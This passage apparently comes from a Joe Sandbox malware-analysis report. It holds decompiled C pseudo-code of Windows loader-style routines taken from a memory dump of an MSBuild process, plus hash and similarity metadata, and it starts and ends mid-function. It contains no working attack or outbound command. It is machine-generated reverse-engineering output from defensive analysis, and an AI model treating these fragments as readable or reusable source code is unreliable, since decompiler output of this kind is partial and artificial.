                                            													_v176 = _t353;
                                            													__eflags = _t340[3] - 0xffffffff;
                                            													if(_t340[3] != 0xffffffff) {
                                            														_t279 =  *_t340;
                                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                            															asm("lock inc dword [edi+0x9c]");
                                            															_t340 =  *(_t353 + 0x50);
                                            														}
                                            													}
                                            													_v184 = _t340[8];
                                            												}
                                            											} else {
                                            												_t339 =  *(_t277 + 4);
                                            												if(_t351 != 0) {
                                            													__eflags = _t339;
                                            													if(_t339 == 0) {
                                            														goto L16;
                                            													} else {
                                            														L118:
                                            														_t277 = _t277 ^ _t339;
                                            														goto L17;
                                            													}
                                            													goto L151;
                                            												} else {
                                            													L16:
                                            													_t277 = _t339;
                                            												}
                                            												goto L17;
                                            											}
                                            										}
                                            										goto L25;
                                            										L17:
                                            									}
                                            									L25:
                                            									E0101FFB0(_t287, _t353, 0x10f84d8);
                                            									_t320 = _v184;
                                            									_t342 = 0x1000;
                                            								}
                                            								if(_t353 == 0) {
                                            									break;
                                            								} else {
                                            									_t366 = 0;
                                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                            										_t288 = _v164;
                                            										if(_t353 != 0) {
                                            											_t342 = _t288;
                                            											_t374 = E0105CC99(_t353, _t288, _v200, 1,  &_v168);
                                            											if(_t374 >= 0) {
                                            												if(_v184 == 7) {
                                            													__eflags = _a20;
                                            													if(__eflags == 0) {
                                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                            														if(__eflags != 0) {
                                            															_t271 = E01016600(0x10f52d8);
                                            															__eflags = _t271;
                                            															if(__eflags == 0) {
                                            																_t342 = 0;
                                            																_v169 = _t271;
                                            																_t374 = E01017926( *(_t353 + 0x50), 0,  &_v169);
                                            															}
                                            														}
                                            													}
                                            												}
                                            												if(_t374 < 0) {
                                            													_v168 = 0;
                                            												} else {
                                            													if( *0x10fb239 != 0) {
                                            														_t342 =  *(_t353 + 0x18);
                                            														E0108E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                            													}
                                            													if( *0x10f8472 != 0) {
                                            														_v192 = 0;
                                            														_t342 =  *0x7ffe0330;
                                            														asm("ror edi, cl");
                                            														 *0x10fb1e0( &_v192, _t353, _v168, 0, _v180);
                                            														 *( *0x10fb218 ^  *0x7ffe0330)();
                                            														_t269 = _v192;
                                            														_t353 = _v176;
                                            														__eflags = _t269;
                                            														if(__eflags != 0) {
                                            															_v168 = _t269;
                                            														}
                                            													}
                                            												}
                                            											}
                                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                            												_t366 = 0xc000007a;
                                            											}
                                            											_t247 =  *(_t353 + 0x50);
                                            											if(_t247[3] == 0xffffffff) {
                                            												L40:
                                            												if(_t366 == 0xc000007a) {
                                            													__eflags = _t288;
                                            													if(_t288 == 0) {
                                            														goto L136;
                                            													} else {
                                            														_t366 = 0xc0000139;
                                            													}
                                            													goto L54;
                                            												}
                                            											} else {
                                            												_t249 =  *_t247;
                                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                            													goto L40;
                                            												} else {
                                            													_t250 = _t249 | 0xffffffff;
                                            													asm("lock xadd [edi+0x9c], eax");
                                            													if((_t249 | 0xffffffff) == 0) {
                                            														E01022280(_t250, 0x10f84d8);
                                            														_t342 =  *(_t353 + 0x54);
                                            														_t165 = _t353 + 0x54; // 0x54
                                            														_t252 = _t165;
                                            														__eflags =  *(_t342 + 4) - _t252;
                                            														if( *(_t342 + 4) != _t252) {
                                            															L135:
                                            															asm("int 0x29");
                                            															L136:
                                            															_t288 = _v200;
                                            															_t366 = 0xc0000138;
                                            															L54:
                                            															_t342 = _t288;
                                            															L01043898(0, _t288, _t366);
                                            														} else {
                                            															_t324 =  *(_t252 + 4);
                                            															__eflags =  *_t324 - _t252;
                                            															if( *_t324 != _t252) {
                                            																goto L135;
                                            															} else {
                                            																 *_t324 = _t342;
                                            																 *(_t342 + 4) = _t324;
                                            																_t293 =  *(_t353 + 0x50);
                                            																_v180 =  *_t293;
                                            																E0101FFB0(_t293, _t353, 0x10f84d8);
                                            																__eflags =  *((short*)(_t353 + 0x3a));
                                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                                            																	_t342 = 0;
                                            																	__eflags = 0;
                                            																	E010437F5(_t353, 0);
                                            																}
                                            																E01040413(_t353);
                                            																_t256 =  *(_t353 + 0x48);
                                            																__eflags = _t256;
                                            																if(_t256 != 0) {
                                            																	__eflags = _t256 - 0xffffffff;
                                            																	if(_t256 != 0xffffffff) {
                                            																		E01039B10(_t256);
                                            																	}
                                            																}
                                            																__eflags =  *(_t353 + 0x28);
                                            																if( *(_t353 + 0x28) != 0) {
                                            																	_t174 = _t353 + 0x24; // 0x24
                                            																	E010302D6(_t174);
                                            																}
                                            																L010277F0( *0x10f7b98, 0, _t353);
                                            																__eflags = _v180 - _t293;
                                            																if(__eflags == 0) {
                                            																	E0103C277(_t293, _t366);
                                            																}
                                            																_t288 = _v164;
                                            																goto L40;
                                            															}
                                            														}
                                            													} else {
                                            														goto L40;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										L0101EC7F(_t353);
                                            										L010319B8(_t287, 0, _t353, 0);
                                            										_t200 = E0100F4E3(__eflags);
                                            										continue;
                                            									}
                                            								}
                                            								L41:
                                            								if(_v157 != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                            								}
                                            								if(_t366 < 0 || ( *0x10fb2f8 |  *0x10fb2fc) == 0 || ( *0x10fb2e4 & 0x00000001) != 0) {
                                            									L46:
                                            									 *_v212 = _v168;
                                            									_t204 = _t366;
                                            									L47:
                                            									_pop(_t354);
                                            									_pop(_t367);
                                            									_pop(_t289);
                                            									return E0104B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                            								} else {
                                            									_v200 = 0;
                                            									if(( *0x10fb2ec >> 0x00000008 & 0x00000003) == 3) {
                                            										_t355 = _v168;
                                            										_t342 =  &_v208;
                                            										_t208 = E010B6B68(_v168,  &_v208, _v168, __eflags);
                                            										__eflags = _t208 - 1;
                                            										if(_t208 == 1) {
                                            											goto L46;
                                            										} else {
                                            											__eflags = _v208 & 0x00000010;
                                            											if((_v208 & 0x00000010) == 0) {
                                            												goto L46;
                                            											} else {
                                            												_t342 = 4;
                                            												_t366 = E010B6AEB(_t355, 4,  &_v216);
                                            												__eflags = _t366;
                                            												if(_t366 >= 0) {
                                            													goto L46;
                                            												} else {
                                            													asm("int 0x29");
                                            													_t356 = 0;
                                            													_v44 = 0;
                                            													_t290 = _v52;
                                            													__eflags = 0;
                                            													if(0 == 0) {
                                            														L108:
                                            														_t356 = 0;
                                            														_v44 = 0;
                                            														goto L63;
                                            													} else {
                                            														__eflags = 0;
                                            														if(0 < 0) {
                                            															goto L108;
                                            														}
                                            														L63:
                                            														_v112 = _t356;
                                            														__eflags = _t356;
                                            														if(_t356 == 0) {
                                            															L143:
                                            															_v8 = 0xfffffffe;
                                            															_t211 = 0xc0000089;
                                            														} else {
                                            															_v36 = 0;
                                            															_v60 = 0;
                                            															_v48 = 0;
                                            															_v68 = 0;
                                            															_v44 = _t290 & 0xfffffffc;
                                            															E0101E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                            															_t306 = _v68;
                                            															__eflags = _t306;
                                            															if(_t306 == 0) {
                                            																_t216 = 0xc000007b;
                                            																_v36 = 0xc000007b;
                                            																_t307 = _v60;
                                            															} else {
                                            																__eflags = _t290 & 0x00000001;
                                            																if(__eflags == 0) {
                                            																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                            																	__eflags = _t349 - 0x10b;
                                            																	if(_t349 != 0x10b) {
                                            																		__eflags = _t349 - 0x20b;
                                            																		if(_t349 == 0x20b) {
                                            																			goto L102;
                                            																		} else {
                                            																			_t307 = 0;
                                            																			_v48 = 0;
                                            																			_t216 = 0xc000007b;
                                            																			_v36 = 0xc000007b;
                                            																			goto L71;
                                            																		}
                                            																	} else {
                                            																		L102:
                                            																		_t307 =  *(_t306 + 0x50);
                                            																		goto L69;
                                            																	}
                                            																	goto L151;
                                            																} else {
                                            																	_t239 = L0101EAEA(_t290, _t290, _t356, _t366, __eflags);
                                            																	_t307 = _t239;
                                            																	_v60 = _t307;
                                            																	_v48 = _t307;
                                            																	__eflags = _t307;
                                            																	if(_t307 != 0) {
                                            																		L70:
                                            																		_t216 = _v36;
                                            																	} else {
                                            																		_push(_t239);
                                            																		_push(0x14);
                                            																		_push( &_v144);
                                            																		_push(3);
                                            																		_push(_v44);
                                            																		_push(0xffffffff);
                                            																		_t319 = E01049730();
                                            																		_v36 = _t319;
                                            																		__eflags = _t319;
                                            																		if(_t319 < 0) {
                                            																			_t216 = 0xc000001f;
                                            																			_v36 = 0xc000001f;
                                            																			_t307 = _v60;
                                            																		} else {
                                            																			_t307 = _v132;
                                            																			L69:
                                            																			_v48 = _t307;
                                            																			goto L70;
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            															L71:
                                            															_v72 = _t307;
                                            															_v84 = _t216;
                                            															__eflags = _t216 - 0xc000007b;
                                            															if(_t216 == 0xc000007b) {
                                            																L150:
                                            																_v8 = 0xfffffffe;
                                            																_t211 = 0xc000007b;
                                            															} else {
                                            																_t344 = _t290 & 0xfffffffc;
                                            																_v76 = _t344;
                                            																__eflags = _v40 - _t344;
                                            																if(_v40 <= _t344) {
                                            																	goto L150;
                                            																} else {
                                            																	__eflags = _t307;
                                            																	if(_t307 == 0) {
                                            																		L75:
                                            																		_t217 = 0;
                                            																		_v104 = 0;
                                            																		__eflags = _t366;
                                            																		if(_t366 != 0) {
                                            																			__eflags = _t290 & 0x00000001;
                                            																			if((_t290 & 0x00000001) != 0) {
                                            																				_t217 = 1;
                                            																				_v104 = 1;
                                            																			}
                                            																			_t290 = _v44;
                                            																			_v52 = _t290;
                                            																		}
                                            																		__eflags = _t217 - 1;
                                            																		if(_t217 != 1) {
                                            																			_t369 = 0;
                                            																			_t218 = _v40;
                                            																			goto L91;
                                            																		} else {
                                            																			_v64 = 0;
                                            																			E0101E9C0(1, _t290, 0, 0,  &_v64);
                                            																			_t309 = _v64;
                                            																			_v108 = _t309;
                                            																			__eflags = _t309;
                                            																			if(_t309 == 0) {
                                            																				goto L143;
                                            																			} else {
                                            																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                            																				__eflags = _t226 - 0x10b;
                                            																				if(_t226 != 0x10b) {
                                            																					__eflags = _t226 - 0x20b;
                                            																					if(_t226 != 0x20b) {
                                            																						goto L143;
                                            																					} else {
                                            																						_t371 =  *(_t309 + 0x98);
                                            																						goto L83;
                                            																					}
                                            																				} else {
                                            																					_t371 =  *(_t309 + 0x88);
                                            																					L83:
                                            																					__eflags = _t371;
                                            																					if(_t371 != 0) {
                                            																						_v80 = _t371 - _t356 + _t290;
                                            																						_t310 = _v64;
                                            																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                            																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                            																						_t311 = 0;
                                            																						__eflags = 0;
                                            																						while(1) {
                                            																							_v120 = _t311;
                                            																							_v116 = _t348;
                                            																							__eflags = _t311 - _t292;
                                            																							if(_t311 >= _t292) {
                                            																								goto L143;
                                            																							}
                                            																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                            																							__eflags = _t371 - _t359;
                                            																							if(_t371 < _t359) {
                                            																								L98:
                                            																								_t348 = _t348 + 0x28;
                                            																								_t311 = _t311 + 1;
                                            																								continue;
                                            																							} else {
                                            																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                            																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                            																									goto L98;
                                            																								} else {
                                            																									__eflags = _t348;
                                            																									if(_t348 == 0) {
                                            																										goto L143;
                                            																									} else {
                                            																										_t218 = _v40;
                                            																										_t312 =  *_t218;
                                            																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                            																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                            																											_v100 = _t359;
                                            																											_t360 = _v108;
                                            																											_t372 = L01018F44(_v108, _t312);
                                            																											__eflags = _t372;
                                            																											if(_t372 == 0) {
                                            																												goto L143;
                                            																											} else {
                                            																												_t290 = _v52;
                                            																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01043C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                            																												_t307 = _v72;
                                            																												_t344 = _v76;
                                            																												_t218 = _v40;
                                            																												goto L91;
                                            																											}
                                            																										} else {
                                            																											_t290 = _v52;
                                            																											_t307 = _v72;
                                            																											_t344 = _v76;
                                            																											_t369 = _v80;
                                            																											L91:
                                            																											_t358 = _a4;
                                            																											__eflags = _t358;
                                            																											if(_t358 == 0) {
                                            																												L95:
                                            																												_t308 = _a8;
                                            																												__eflags = _t308;
                                            																												if(_t308 != 0) {
                                            																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                            																												}
                                            																												_v8 = 0xfffffffe;
                                            																												_t211 = _v84;
                                            																											} else {
                                            																												_t370 =  *_t218 - _t369 + _t290;
                                            																												 *_t358 = _t370;
                                            																												__eflags = _t370 - _t344;
                                            																												if(_t370 <= _t344) {
                                            																													L149:
                                            																													 *_t358 = 0;
                                            																													goto L150;
                                            																												} else {
                                            																													__eflags = _t307;
                                            																													if(_t307 == 0) {
                                            																														goto L95;
                                            																													} else {
                                            																														__eflags = _t370 - _t344 + _t307;
                                            																														if(_t370 >= _t344 + _t307) {
                                            																															goto L149;
                                            																														} else {
                                            																															goto L95;
                                            																														}
                                            																													}
                                            																												}
                                            																											}
                                            																										}
                                            																									}
                                            																								}
                                            																							}
                                            																							goto L97;
                                            																						}
                                            																					}
                                            																					goto L143;
                                            																				}
                                            																			}
                                            																		}
                                            																	} else {
                                            																		__eflags = _v40 - _t307 + _t344;
                                            																		if(_v40 >= _t307 + _t344) {
                                            																			goto L150;
                                            																		} else {
                                            																			goto L75;
                                            																		}
                                            																	}
                                            																}
                                            															}
                                            														}
                                            														L97:
                                            														 *[fs:0x0] = _v20;
                                            														return _t211;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										goto L46;
                                            									}
                                            								}
                                            								goto L151;
                                            							}
                                            							_t288 = _v164;
                                            							_t366 = 0xc0000135;
                                            							goto L41;
                                            						}
                                            					}
                                            				}
                                            				L151:
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 569955f6cf02d2537555f36efe9dee5489b321115cb02f97205dc9e25c9edff1
                                            • Instruction ID: 25b93ca5f26f54c6cc1bf11d71f5feb36a5771653c3ababac60dbffbc4d8c5b3
                                            • Opcode Fuzzy Hash: 569955f6cf02d2537555f36efe9dee5489b321115cb02f97205dc9e25c9edff1
                                            • Instruction Fuzzy Hash: 29E1D270B0025A8FEB71CF58C888BA9B7F5BF45304F0441D9DAC99B285DB38A981CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0101849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                            				void* _t136;
                                            				signed int _t139;
                                            				signed int _t141;
                                            				signed int _t145;
                                            				intOrPtr _t146;
                                            				signed int _t149;
                                            				signed int _t150;
                                            				signed int _t161;
                                            				signed int _t163;
                                            				signed int _t165;
                                            				signed int _t169;
                                            				signed int _t171;
                                            				signed int _t194;
                                            				signed int _t200;
                                            				void* _t201;
                                            				signed int _t204;
                                            				signed int _t206;
                                            				signed int _t210;
                                            				signed int _t214;
                                            				signed int _t215;
                                            				signed int _t218;
                                            				void* _t221;
                                            				signed int _t224;
                                            				signed int _t226;
                                            				intOrPtr _t228;
                                            				signed int _t232;
                                            				signed int _t233;
                                            				signed int _t234;
                                            				void* _t237;
                                            				void* _t238;
                                            
                                            				_t236 = __esi;
                                            				_t235 = __edi;
                                            				_t193 = __ebx;
                                            				_push(0x70);
                                            				_push(0x10df9c0);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                            				if( *0x10f7b04 == 0) {
                                            					L4:
                                            					goto L5;
                                            				} else {
                                            					_t136 = E0101CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                            					_t236 = 0;
                                            					if(_t136 < 0) {
                                            						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                            					}
                                            					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                            						_t193 =  *( *[fs:0x30] + 0x18);
                                            						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                            						 *(_t237 - 0x68) = _t236;
                                            						 *(_t237 - 0x6c) = _t236;
                                            						_t235 = _t236;
                                            						 *(_t237 - 0x60) = _t236;
                                            						E01022280( *[fs:0x30], 0x10f8550);
                                            						_t139 =  *0x10f7b04; // 0x1
                                            						__eflags = _t139 - 1;
                                            						if(__eflags != 0) {
                                            							_t200 = 0xc;
                                            							_t201 = _t237 - 0x40;
                                            							_t141 = E0103F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                            							 *(_t237 - 0x44) = _t141;
                                            							__eflags = _t141;
                                            							if(_t141 < 0) {
                                            								L50:
                                            								E0101FFB0(_t193, _t235, 0x10f8550);
                                            								L5:
                                            								return E0105D130(_t193, _t235, _t236);
                                            							}
                                            							_push(_t201);
                                            							_t221 = 0x10;
                                            							_t202 =  *(_t237 - 0x40);
                                            							_t145 = E01001C45( *(_t237 - 0x40), _t221);
                                            							 *(_t237 - 0x44) = _t145;
                                            							__eflags = _t145;
                                            							if(_t145 < 0) {
                                            								goto L50;
                                            							}
                                            							_t146 =  *0x10f7b9c; // 0x0
                                            							_t235 = L01024620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                            							 *(_t237 - 0x60) = _t235;
                                            							__eflags = _t235;
                                            							if(_t235 == 0) {
                                            								_t149 = 0xc0000017;
                                            								 *(_t237 - 0x44) = 0xc0000017;
                                            							} else {
                                            								_t149 =  *(_t237 - 0x44);
                                            							}
                                            							__eflags = _t149;
                                            							if(__eflags >= 0) {
                                            								L8:
                                            								 *(_t237 - 0x64) = _t235;
                                            								_t150 =  *0x10f7b10; // 0x0
                                            								 *(_t237 - 0x4c) = _t150;
                                            								_push(_t237 - 0x74);
                                            								_push(_t237 - 0x39);
                                            								_push(_t237 - 0x58);
                                            								_t193 = E0103A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                            								 *(_t237 - 0x44) = _t193;
                                            								__eflags = _t193;
                                            								if(_t193 < 0) {
                                            									L30:
                                            									E0101FFB0(_t193, _t235, 0x10f8550);
                                            									__eflags = _t235 - _t237 - 0x38;
                                            									if(_t235 != _t237 - 0x38) {
                                            										_t235 =  *(_t237 - 0x48);
                                            										L010277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                            									} else {
                                            										_t235 =  *(_t237 - 0x48);
                                            									}
                                            									__eflags =  *(_t237 - 0x6c);
                                            									if( *(_t237 - 0x6c) != 0) {
                                            										L010277F0(_t235, _t236,  *(_t237 - 0x6c));
                                            									}
                                            									__eflags = _t193;
                                            									if(_t193 >= 0) {
                                            										goto L4;
                                            									} else {
                                            										goto L5;
                                            									}
                                            								}
                                            								_t204 =  *0x10f7b04; // 0x1
                                            								 *(_t235 + 8) = _t204;
                                            								__eflags =  *((char*)(_t237 - 0x39));
                                            								if( *((char*)(_t237 - 0x39)) != 0) {
                                            									 *(_t235 + 4) = 1;
                                            									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                            									_t161 =  *0x10f7b10; // 0x0
                                            									 *(_t237 - 0x4c) = _t161;
                                            								} else {
                                            									 *(_t235 + 4) = _t236;
                                            									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                            								}
                                            								 *((intOrPtr*)(_t237 - 0x54)) = E010437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                            								_t224 = _t236;
                                            								 *(_t237 - 0x40) = _t236;
                                            								 *(_t237 - 0x50) = _t236;
                                            								while(1) {
                                            									_t163 =  *(_t235 + 8);
                                            									__eflags = _t224 - _t163;
                                            									if(_t224 >= _t163) {
                                            										break;
                                            									}
                                            									_t228 =  *0x10f7b9c; // 0x0
                                            									_t214 = L01024620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                            									 *(_t237 - 0x78) = _t214;
                                            									__eflags = _t214;
                                            									if(_t214 == 0) {
                                            										L52:
                                            										_t193 = 0xc0000017;
                                            										L19:
                                            										 *(_t237 - 0x44) = _t193;
                                            										L20:
                                            										_t206 =  *(_t237 - 0x40);
                                            										__eflags = _t206;
                                            										if(_t206 == 0) {
                                            											L26:
                                            											__eflags = _t193;
                                            											if(_t193 < 0) {
                                            												E010437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                            												__eflags =  *((char*)(_t237 - 0x39));
                                            												if( *((char*)(_t237 - 0x39)) != 0) {
                                            													 *0x10f7b10 =  *0x10f7b10 - 8;
                                            												}
                                            											} else {
                                            												_t169 =  *(_t237 - 0x68);
                                            												__eflags = _t169;
                                            												if(_t169 != 0) {
                                            													 *0x10f7b04 =  *0x10f7b04 - _t169;
                                            												}
                                            											}
                                            											__eflags = _t193;
                                            											if(_t193 >= 0) {
                                            												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                            											}
                                            											goto L30;
                                            										}
                                            										_t226 = _t206 * 0xc;
                                            										__eflags = _t226;
                                            										_t194 =  *(_t237 - 0x48);
                                            										do {
                                            											 *(_t237 - 0x40) = _t206 - 1;
                                            											_t226 = _t226 - 0xc;
                                            											 *(_t237 - 0x4c) = _t226;
                                            											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                            											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                            												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                            												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                            													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                            													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                            													__eflags =  *((char*)(_t237 - 0x39));
                                            													if( *((char*)(_t237 - 0x39)) == 0) {
                                            														_t171 = _t210;
                                            													} else {
                                            														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                            														L010277F0(_t194, _t236, _t210 - 8);
                                            														_t171 =  *(_t237 - 0x50);
                                            													}
                                            													L48:
                                            													L010277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                            													L46:
                                            													_t206 =  *(_t237 - 0x40);
                                            													_t226 =  *(_t237 - 0x4c);
                                            													goto L24;
                                            												}
                                            												 *0x10f7b08 =  *0x10f7b08 + 1;
                                            												goto L24;
                                            											}
                                            											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                            											__eflags = _t171;
                                            											if(_t171 != 0) {
                                            												__eflags =  *((char*)(_t237 - 0x39));
                                            												if( *((char*)(_t237 - 0x39)) == 0) {
                                            													goto L48;
                                            												}
                                            												E010457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                            												goto L46;
                                            											}
                                            											L24:
                                            											__eflags = _t206;
                                            										} while (_t206 != 0);
                                            										_t193 =  *(_t237 - 0x44);
                                            										goto L26;
                                            									}
                                            									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                            									 *(_t237 - 0x7c) = _t232;
                                            									 *(_t232 - 4) = _t214;
                                            									 *(_t237 - 4) = _t236;
                                            									E0104F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                            									_t238 = _t238 + 0xc;
                                            									 *(_t237 - 4) = 0xfffffffe;
                                            									_t215 =  *(_t237 - 0x48);
                                            									__eflags = _t193;
                                            									if(_t193 < 0) {
                                            										L010277F0(_t215, _t236,  *(_t237 - 0x78));
                                            										goto L20;
                                            									}
                                            									__eflags =  *((char*)(_t237 - 0x39));
                                            									if( *((char*)(_t237 - 0x39)) != 0) {
                                            										_t233 = E0103A44B( *(_t237 - 0x4c));
                                            										 *(_t237 - 0x50) = _t233;
                                            										__eflags = _t233;
                                            										if(_t233 == 0) {
                                            											L010277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                            											goto L52;
                                            										}
                                            										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                            										L17:
                                            										_t234 =  *(_t237 - 0x40);
                                            										_t218 = _t234 * 0xc;
                                            										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                            										 *(_t218 + _t235 + 0x10) = _t236;
                                            										_t224 = _t234 + 1;
                                            										 *(_t237 - 0x40) = _t224;
                                            										 *(_t237 - 0x50) = _t224;
                                            										_t193 =  *(_t237 - 0x44);
                                            										continue;
                                            									}
                                            									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                            									goto L17;
                                            								}
                                            								 *_t235 = _t236;
                                            								_t165 = 0x10 + _t163 * 0xc;
                                            								__eflags = _t165;
                                            								_push(_t165);
                                            								_push(_t235);
                                            								_push(0x23);
                                            								_push(0xffffffff);
                                            								_t193 = E010496C0();
                                            								goto L19;
                                            							} else {
                                            								goto L50;
                                            							}
                                            						}
                                            						_t235 = _t237 - 0x38;
                                            						 *(_t237 - 0x60) = _t235;
                                            						goto L8;
                                            					}
                                            					goto L4;
                                            				}
                                            			}

































                                            0x0101862c
                                            0x00000000
                                            0x0101873d
                                            0x00000000
                                            0x0101873d
                                            0x01018737
                                            0x0101850f
                                            0x01018512
                                            0x00000000
                                            0x01018512
                                            0x00000000
                                            0x010184d6

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3076d0754171b23bf77fba746cde91c8bea7c205b0657dbbc1da2a640c40babd
                                            • Instruction ID: 2c2a4a6f040ac6144cce290513913b01606ae2ecdab95ed5d2c62846d0197b34
                                            • Opcode Fuzzy Hash: 3076d0754171b23bf77fba746cde91c8bea7c205b0657dbbc1da2a640c40babd
                                            • Instruction Fuzzy Hash: 68B17C70E00209DFDB25CFE8C984AEDBBB9FF59304F10812EE585AB649DB74A945CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0103513A(intOrPtr __ecx, void* __edx) {
                                            				signed int _v8;
                                            				signed char _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				char _v63;
                                            				char _v64;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _v84;
                                            				signed int _v88;
                                            				signed char* _v92;
                                            				signed int _v100;
                                            				signed int _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t157;
                                            				signed int _t159;
                                            				signed int _t160;
                                            				unsigned int* _t161;
                                            				intOrPtr _t165;
                                            				signed int _t172;
                                            				signed char* _t181;
                                            				intOrPtr _t189;
                                            				intOrPtr* _t200;
                                            				signed int _t202;
                                            				signed int _t203;
                                            				char _t204;
                                            				signed int _t207;
                                            				signed int _t208;
                                            				void* _t209;
                                            				intOrPtr _t210;
                                            				signed int _t212;
                                            				signed int _t214;
                                            				signed int _t221;
                                            				signed int _t222;
                                            				signed int _t226;
                                            				intOrPtr* _t232;
                                            				signed int _t233;
                                            				signed int _t234;
                                            				intOrPtr _t237;
                                            				intOrPtr _t238;
                                            				intOrPtr _t240;
                                            				void* _t245;
                                            				signed int _t246;
                                            				signed int _t247;
                                            				void* _t248;
                                            				void* _t251;
                                            				void* _t252;
                                            				signed int _t253;
                                            				signed int _t255;
                                            				signed int _t256;
                                            
                                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x10fd360 ^ _t255;
                                            				_v32 = _v32 & 0x00000000;
                                            				_t251 = __edx;
                                            				_t237 = __ecx;
                                            				_t212 = 6;
                                            				_t245 =  &_v84;
                                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                            				_v48 = __ecx;
                                            				_v36 = _t207;
                                            				_t157 = memset(_t245, 0, _t212 << 2);
                                            				_t256 = _t255 + 0xc;
                                            				_t246 = _t245 + _t212;
                                            				if(_t207 == 2) {
                                            					_t247 =  *(_t237 + 0x60);
                                            					_t208 =  *(_t237 + 0x64);
